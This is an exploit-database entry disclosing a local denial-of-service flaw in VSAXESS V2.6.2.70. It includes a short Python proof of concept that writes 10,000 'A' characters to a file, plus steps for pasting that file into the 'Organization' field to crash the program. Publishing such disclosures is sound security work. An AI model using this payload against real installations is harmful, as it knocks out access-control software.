header-logo
Suggest Exploit
vendor:
VSAXESS
by:
Diego Santamaria
6.5
CVSS
MEDIUM
Denial of Service (DoS) Local
400
CWE
Product Name: VSAXESS
Affected Version From: V2.6.2.70 build20171226_053
Affected Version To: V2.6.2.70 build20171226_053
Patch Exists: NO
Related CWE: N/A
CPE: a:visionistech:vsaxess:2.6.2.70_build20171226_053
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Professional
2018

VSAXESS V2.6.2.70 build20171226_053 – ‘organization’ Denial of Service (PoC)

VSAXESS V2.6.2.70 build20171226_053 is vulnerable to a denial of service attack when a malicious user sends a large amount of data to the 'Organization' field. This can be exploited by running the python code organization.py, opening organization_exploit.txt and copying the content, opening VSAXESS.exe, registering a password and username, choosing 'Control Panel', choosing 'Access Control', choosing 'Add', and pasting the content from organization_exploit.txt on 'Organization' which will cause the application to crash.

Mitigation:

Input validation should be used to prevent malicious users from sending large amounts of data to the 'Organization' field.
Source

Exploit-DB raw data:

# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-11-05
# Vendor Homepage: https:https://www.visionistech.com/en/home/
# Software Link: https://www.visionistech.com/en/vsaxess-desktop-software/
# Tested Version: V2.6.2.70 build20171226_053
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional
 
# Steps to Reproduce: 

# 1. Run the python code organization.py 
# 2. Open organization_exploit.txt and copy the content 
# 3. Open VSAXESS.exe 
# 4. Register a password and username
# 5. choose 'Control Panel'
# 6. choose 'Access Control'
# 7. choose 'Add'
# 8. Paste the content from organization_exploit.txt on 'Organization' and Crashed
 
#!/usr/bin/env python3

content = "\x41" * 10000
f = open ("organization_exploit.txt", "w")
f.write(content)
f.close()